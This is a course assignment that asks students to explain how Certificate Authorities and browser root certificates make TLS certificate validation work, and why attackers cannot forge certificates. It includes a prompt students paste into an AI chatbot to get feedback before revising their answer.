Write a clear explanation. Use correct terminology. Use clear paragraphs and a address all of these points:

What role the Certificate Authority (CA) plays
How the browser validates the certificate using pre-installed root certificates
Why an attacker cannot simply create a valid certificate for a domain they don't own

Save your work.

After completing your response, use an AI chatbot (such as ChatGPT, Claude, Gemini, or similar) to evaluate your work. Copy and paste the following prompt along with your response:

I am a student completing a written assignment about TLS certificate validation.
Please evaluate my response below for:

1. **Technical Accuracy**: Are there any factual errors or misconceptions?
2. **Completeness**: Did I address all required points adequately?
3. **Clarity**: Is my explanation clear and well-structured?
4. **Terminology**: Did I use technical terms correctly?

If I made any errors, please explain what is incorrect and why. If I missed important
concepts, list what should be added. Be specific and constructive.

[PASTE YOUR OWN WRITTEN RESPONSE HERE]

Correct/Amend your written response and place it UNDERNEATH your original response.